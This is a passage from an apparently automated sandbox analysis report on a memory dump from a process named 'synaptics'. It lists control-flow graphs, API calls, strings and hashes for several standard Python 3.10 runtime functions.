390->400 396 6c4bd88a-6c4bd8a9 PyErr_Format 391->396 397 6c4bd883-6c4bd888 391->397 392->393 403 6c4bd84c-6c4bd84f 393->403 404 6c4bd852-6c4bd856 393->404 397->390 397->396 398->378 406 6c4bd92b-6c4bd92e 399->406 407 6c4bd954-6c4bd95c 399->407 400->326 415 6c4bd8cb-6c4bd8d7 PyDict_Contains 400->415 410 6c4bd769-6c4bd76c 401->410 402->410 403->404 411 6c4bd858-6c4bd85b 404->411 412 6c4bd85e-6c4bd862 404->412 414 6c4bd930-6c4bd939 406->414 416 6c4bd77a-6c4bd77c 410->416 417 6c4bd76e-6c4bd777 410->417 411->412 412->383 418 6c4bd864-6c4bd867 412->418 413->389 419 6c4bd809-6c4bd811 413->419 420 6c4bd93b-6c4bd944 call 6c4bd9c0 414->420 421 6c4bd94a-6c4bd952 414->421 415->326 422 6c4bd8dd 415->422 416->366 423 6c4bd77e-6c4bd787 416->423 417->416 418->383 419->389 420->326 420->421 421->407 421->414 422->399 425 6c4bd8df-6c4bd8f4 call 6c4d2b80 422->425 425->326 430 6c4bd8fa-6c4bd90b PyDict_SetItem 425->430 430->326 431 6c4bd911 430->431 431->399
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(Type does not define the tp_name field.,?,?,?,00000000), ref: 6C4BD56F
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      • PyType_Ready.PYTHON310(?), ref: 6C4BD5E3
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74C848), ref: 6C4BD6D9
                                                                                                                                                                                                      • PyDict_Contains.PYTHON310(00000000,00000000,?,00000000), ref: 6C4BD6EB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • type '%.100s' participates in gc and is a base type but has inappropriate tp_free slot, xrefs: 6C4BD88D
                                                                                                                                                                                                      • Type does not define the tp_name field., xrefs: 6C4BD564
                                                                                                                                                                                                      • type '%.100s' is not dynamically allocated but its base type '%.100s' is dynamically allocated, xrefs: 6C4BD73F
                                                                                                                                                                                                      • `<tl, xrefs: 6C4BD5B3
                                                                                                                                                                                                      • `<tl, xrefs: 6C4BD5CF
                                                                                                                                                                                                      • `<tl, xrefs: 6C4BD6A8
                                                                                                                                                                                                      • `<tl, xrefs: 6C4BD5C2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatFromUnicode_$ClearContainsDict_ObjectReadyType_
                                                                                                                                                                                                      • String ID: Type does not define the tp_name field.$`<tl$`<tl$`<tl$`<tl$type '%.100s' is not dynamically allocated but its base type '%.100s' is dynamically allocated$type '%.100s' participates in gc and is a base type but has inappropriate tp_free slot
                                                                                                                                                                                                      • API String ID: 2259164727-3675976106
                                                                                                                                                                                                      • Opcode ID: 569192cc00f3f2796297cc60d4d397e26f83864b86b833ad57dd56b9854c4479
                                                                                                                                                                                                      • Instruction ID: 36c3c13b48471449319e539a02f10e459924254285cde8eddf6d89eb024cb9d9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 569192cc00f3f2796297cc60d4d397e26f83864b86b833ad57dd56b9854c4479
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2CB1B371A017018FE310DE25DA80F56B7E4BF4432EF144AACD86997F59EB34E8098BA1
                                                                                                                                                                                                      Function 6C5BB940 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 178COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyModule_CreateInitialized.PYTHON310(6C74E270,000003F5,00000000,?,?,?,?,?,?,?,?,?,?,6C588104,?), ref: 6C5BB984
                                                                                                                                                                                                        • Part of subcall function 6C4A0390: PyModuleDef_Init.PYTHON310(?,?,?,?,6C4A0382,?,?), ref: 6C4A0399
                                                                                                                                                                                                      • PyModule_GetDict.PYTHON310(00000000,?,?,?,?,?,?,?,?,?,?,6C588104,?), ref: 6C5BB9B4
                                                                                                                                                                                                      • PyDict_SetItemString.PYTHON310(00000001,modules,?,?,?,?,?,?,?,?,?,?,?,?,6C588104,?), ref: 6C5BB9DA
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C588104), ref: 6C5BB9EC
                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?), ref: 6C5BB9F6
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,?,?,?,?,?), ref: 6C5BBA06
                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 6C5BBA10
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,?,?,?), ref: 6C5BBA1F
                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5BBA29
                                                                                                                                                                                                      • _PyObject_New.PYTHON310(?,?,?,?,?,?,?,?,?,?,?), ref: 6C5BBA3F
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74E300,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5BBA5C
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5BBA6F
                                                                                                                                                                                                      • PyDict_SetItemString.PYTHON310(00000001,__stderr__,00000000), ref: 6C5BBA86
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Dict_Item__acrt_iob_func_fileno$Module_String$CreateDef_DictFromInitInitializedModuleObject_Unicode_
                                                                                                                                                                                                      • String ID: __stderr__$modules$sys
                                                                                                                                                                                                      • API String ID: 1451288247-1986620328
                                                                                                                                                                                                      • Opcode ID: 349e6261b385d1577f0ad3f558a05d4ff46256a757a4bdeb3f9d0a14a43af277
                                                                                                                                                                                                      • Instruction ID: 1d2f1f94d8490484ab9f7d6216ad3f9dff431f0b58f8b179a0f8230e9bae3ee2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 349e6261b385d1577f0ad3f558a05d4ff46256a757a4bdeb3f9d0a14a43af277
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F5104B1E002008BDB00AF58DD85FEABBF4EF00329F048169ED09ABB51E775D944CBA1
                                                                                                                                                                                                      Function 6C5764C0 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 193COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 461 6c5764c0-6c5764e3 462 6c5764e5-6c576505 _PyErr_Format 461->462 463 6c576511-6c57651a 461->463 464 6c576508 462->464 463->464 465 6c57651c-6c57652b PyDict_GetItemWithError 463->465 466 6c57650a-6c576510 464->466 467 6c576531-6c576534 465->467 468 6c5766a0-6c5766a8 465->468 467->466 469 6c576536-6c57654a PyDict_SetItem 467->469 469->464 470 6c57654c-6c576552 469->470 471 6c576653-6c576664 470->471 472 6c576558 470->472 473 6c576560-6c576570 PyList_GetItem 472->473 473->464 474 6c576572-6c57657e 473->474 475 6c576584-6c57658e 474->475 476 6c5766a9-6c5766b3 _Py_FatalError_TstateNULL 474->476 477 6c576590-6c576598 475->477 478 6c5765fe-6c576611 _PyObject_MakeTpCall 475->478 477->478 479 6c57659a-6c5765a6 477->479 480 6c576613-6c576615 478->480 486 6c5765a9-6c5765b3 479->486 481 6c576617-6c57662e PyErr_GivenExceptionMatches 480->481 482 6c576665-6c576677 PyDict_SetItem 480->482 481->464 483 6c576634-6c57664d _PyErr_Clear 481->483 484 6c576697-6c57669f 482->484 485 6c576679-6c57667c 482->485 483->471 483->473 485->464 487 6c576682-6c576696 485->487 488 6c5765b5-6c5765b7 486->488 489 6c5765d0-6c5765d2 486->489 488->480 490 6c5765b9-6c5765ce _PyErr_Format 488->490 489->480 491 6c5765d4-6c5765d7 489->491 490->480 493 6c5765e5-6c5765fc _PyErr_FormatFromCauseTstate 491->493 494 6c5765d9-6c5765e2 491->494 493->480 494->493
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\listobject.c,000000D6), ref: 6C576500
                                                                                                                                                                                                      • PyDict_GetItemWithError.PYTHON310(00000000,6C5766FD), ref: 6C576521
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(?,6C5766FD,?,00000000,?,?,?,?,?,6C5766FD,00000000,?), ref: 6C576540
                                                                                                                                                                                                      • PyList_GetItem.PYTHON310(00000000,00000000,?,?,?,00000000,?,?,?,?,?,6C5766FD,00000000,?), ref: 6C576564
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%R returned NULL without setting an exception,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5765C6
                                                                                                                                                                                                      • PyErr_GivenExceptionMatches.PYTHON310(?), ref: 6C576624
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C576635
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %R returned NULL without setting an exception, xrefs: 6C5765BA
                                                                                                                                                                                                      • %R returned a result with an exception set, xrefs: 6C5765E6
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C5764F4
                                                                                                                                                                                                      • D:\a\1\s\Objects\listobject.c, xrefs: 6C5764EF
                                                                                                                                                                                                      • PyThreadState_Get, xrefs: 6C5766A9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Item$Dict_Format$ClearErrorExceptionGivenList_MatchesWith
                                                                                                                                                                                                      • String ID: %R returned NULL without setting an exception$%R returned a result with an exception set$%s:%d: bad argument to internal function$D:\a\1\s\Objects\listobject.c$PyThreadState_Get
                                                                                                                                                                                                      • API String ID: 1841074279-2484821363
                                                                                                                                                                                                      • Opcode ID: ed94cb37e8f62eab04b27ce03eef7ed8e225440117d6cf5f5872880e8d7ae306
                                                                                                                                                                                                      • Instruction ID: 2d7c98f1da591cd2639b10d5ffae8b1d8200ea5cb0fd56f75206a499d235e247
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed94cb37e8f62eab04b27ce03eef7ed8e225440117d6cf5f5872880e8d7ae306
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4512372600301ABCB20DE69DC41E96B7F8EF84329F440669FD18D7A12EB31D955DBE2
                                                                                                                                                                                                      Function 6C5698A0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 193COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PySys_Audit.PYTHON310(open,Osi,?,?,00000000,?,?), ref: 6C5698CF
                                                                                                                                                                                                      • _PyUnicode_AsUnicode.PYTHON310(?), ref: 6C569910
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,0000000A,?,?,?,?,?), ref: 6C569930
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AuditByteCharMultiSys_UnicodeUnicode_Wide
                                                                                                                                                                                                      • String ID: Osi$PyEval_SaveThread$open
                                                                                                                                                                                                      • API String ID: 2319763434-3428564579
                                                                                                                                                                                                      • Opcode ID: b99e385856734ee690a71fb50046461a4c3e12326e887b7a8b95a7b577cc1591
                                                                                                                                                                                                      • Instruction ID: 940c9c15382786504d757482b3dc4ac752728ef28f3b13dcf28cf3b5073e2f05
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b99e385856734ee690a71fb50046461a4c3e12326e887b7a8b95a7b577cc1591
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B251C3716053059FDB019F25CC85A9B77E4AF85368F004939FD199BB51DB30E904CBD6
                                                                                                                                                                                                      Function 6C5697E0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PySys_Audit.PYTHON310(open,uui,?,?,00000000), ref: 6C5697FF
                                                                                                                                                                                                      • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?), ref: 6C569811
                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C569823
                                                                                                                                                                                                      • _set_thread_local_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C535380), ref: 6C569833
                                                                                                                                                                                                      • _get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C56983F
                                                                                                                                                                                                      • _set_thread_local_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C56984B
                                                                                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 6C569864
                                                                                                                                                                                                      • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 6C569874
                                                                                                                                                                                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C56988C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _set_thread_local_invalid_parameter_handler$AuditFileHandleInformationSys_Type_fileno_get_osfhandle_wfopenfclose
                                                                                                                                                                                                      • String ID: open$uui
                                                                                                                                                                                                      • API String ID: 1565516087-3858115597
                                                                                                                                                                                                      • Opcode ID: c350fcc436e7f8424035393c145107ffb222861e84d3655fbf7e9628f1e64caa
                                                                                                                                                                                                      • Instruction ID: a728c0db290d607eb39b829712da6509bd9b889d96c4825210355758627c247c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c350fcc436e7f8424035393c145107ffb222861e84d3655fbf7e9628f1e64caa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD1108716005006BDB1027295C49ABF3B79DF8323AF054139FD2AD6651E735E62187B7
                                                                                                                                                                                                      Function 6C4BD2A0 Relevance: 18.2, APIs: 12, Instructions: 228memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 568 6c4bd2a0-6c4bd2bb 569 6c4bd2c1 568->569 570 6c4bd375-6c4bd377 call 6c4bc120 568->570 571 6c4bd2c6-6c4bd2ca 569->571 575 6c4bd37c-6c4bd37e 570->575 573 6c4bd368-6c4bd36f 571->573 574 6c4bd2d0-6c4bd2de call 6c4c0d90 571->574 573->570 573->571 574->573 584 6c4bd2e4-6c4bd2e7 574->584 577 6c4bd513-6c4bd51c 575->577 578 6c4bd384-6c4bd389 575->578 580 6c4bd38f-6c4bd39f 578->580 581 6c4bd443-6c4bd448 578->581 580->581 585 6c4bd3a5 580->585 582 6c4bd4ef-6c4bd4f8 call 6c4bd160 581->582 583 6c4bd44e-6c4bd45e 581->583 582->577 598 6c4bd4fa-6c4bd502 582->598 583->582 586 6c4bd464-6c4bd477 PyType_GenericAlloc 583->586 584->573 587 6c4bd2e9-6c4bd2f8 PyDict_Contains 584->587 588 6c4bd3b0-6c4bd3c3 PyType_GenericAlloc 585->588 586->577 590 6c4bd47d-6c4bd492 PyUnicode_FromString 586->590 587->573 591 6c4bd2fa 587->591 588->577 592 6c4bd3c9-6c4bd3de PyUnicode_FromString 588->592 594 6c4bd498-6c4bd4ac PyUnicode_InternInPlace 590->594 595 6c4bd521 590->595 591->577 596 6c4bd300-6c4bd307 591->596 592->595 597 6c4bd3e4-6c4bd3f8 PyUnicode_InternInPlace 592->597 599 6c4bd528 594->599 600 6c4bd4ae-6c4bd4cc PyDict_SetDefault 594->600 595->599 601 6c4bd309-6c4bd31d PyDict_SetItem 596->601 602 6c4bd325-6c4bd337 PyDescr_NewWrapper 596->602 597->599 603 6c4bd3fe-6c4bd41c PyDict_SetDefault 597->603 606 6c4bd52b 599->606 604 6c4bd4ce-6c4bd4d0 600->604 605 6c4bd51d-6c4bd51f 600->605 601->577 607 6c4bd323 601->607 602->577 608 6c4bd33d-6c4bd352 PyDict_SetItem 602->608 603->605 609 6c4bd422-6c4bd424 603->609 610 6c4bd4de-6c4bd4e9 604->610 611 6c4bd4d2-6c4bd4db 604->611 605->606 606->577 612 6c4bd52d-6c4bd542 606->612 607->573 613 6c4bd358-6c4bd35a 608->613 614 6c4bd503-6c4bd505 608->614 615 6c4bd432-6c4bd43d 609->615 616 6c4bd426-6c4bd42f 609->616 610->582 610->586 611->610 613->573 618 6c4bd35c-6c4bd365 613->618 614->577 617 6c4bd507-6c4bd510 614->617 615->581 615->588 616->615 617->577 618->573
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyDict_Contains.PYTHON310(?,6C74C908,?,?,?,?,?,00000000), ref: 6C4BD2EE
                                                                                                                                                                                                        • Part of subcall function 6C4769C0: PyObject_Hash.PYTHON310(6C4BD18B,?,?,6C4BD18B,?,00000000,?,?,?,00000000), ref: 6C4769D9
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(?,6C74C908,?,?,?,?,?,00000000), ref: 6C4BD313
                                                                                                                                                                                                        • Part of subcall function 6C473BB0: _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\dictobject.c,00000645), ref: 6C473BDE
                                                                                                                                                                                                      • PyDescr_NewWrapper.PYTHON310(?,6C74C8F0,00000000,?,?,?,?,00000000), ref: 6C4BD32B
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(?,6C74C908,00000000,?,?,?,?,?,?,?,00000000), ref: 6C4BD343
                                                                                                                                                                                                      • PyType_GenericAlloc.PYTHON310(?,00000000,?,?,?,?,?,00000000), ref: 6C4BD3B7
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(?,?,?,?,?,00000000), ref: 6C4BD3D1
                                                                                                                                                                                                      • PyUnicode_InternInPlace.PYTHON310(?,?,?,?,?,?,00000000), ref: 6C4BD3E8
                                                                                                                                                                                                      • PyDict_SetDefault.PYTHON310(?,?,00000000,?,?,?,?,?,?), ref: 6C4BD40D
                                                                                                                                                                                                      • PyType_GenericAlloc.PYTHON310(?,00000000,?,?,?,?,?,00000000), ref: 6C4BD46B
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(?,?,?,?,?,00000000), ref: 6C4BD485
                                                                                                                                                                                                      • PyUnicode_InternInPlace.PYTHON310(?,?,?,?,?,?,00000000), ref: 6C4BD49C
                                                                                                                                                                                                      • PyDict_SetDefault.PYTHON310(?,?,00000000,?,?,?,?,?,?), ref: 6C4BD4BD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
